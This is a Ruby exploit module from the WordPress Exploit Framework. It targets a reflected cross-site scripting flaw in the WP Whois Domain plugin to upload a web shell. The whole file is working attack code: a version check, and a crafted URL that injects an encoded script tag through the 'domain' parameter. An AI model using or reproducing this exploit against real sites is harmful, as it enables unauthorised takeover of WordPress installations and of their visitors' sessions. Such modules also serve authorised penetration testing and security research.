# frozen_string_literal: true

class Wpxf::Exploit::WpWhoisDomainReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'WP Whois Domain Reflected XSS Shell Upload',
      author: [
        'rastating' # WPXF module
      ],
      references: [
        ['WPVDB', '8683'],
        ['URL', 'https://www.rastating.com/wp-whois-domain-reflected-xss/']
      ],
      date: 'Nov 28 2016'
    )

    register_options([
      StringOption.new(
        name: 'form_path',
        desc: 'The path of the page that contains the WP Whois Domain form',
        required: true
      )
    ])
  end

  def check
    check_plugin_version_from_readme('wp-whois-domain')
  end

  def vulnerable_url
    normalize_uri(full_uri, datastore['form_path'])
  end

  def url_with_xss
    "#{vulnerable_url}?domain=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
  end
end
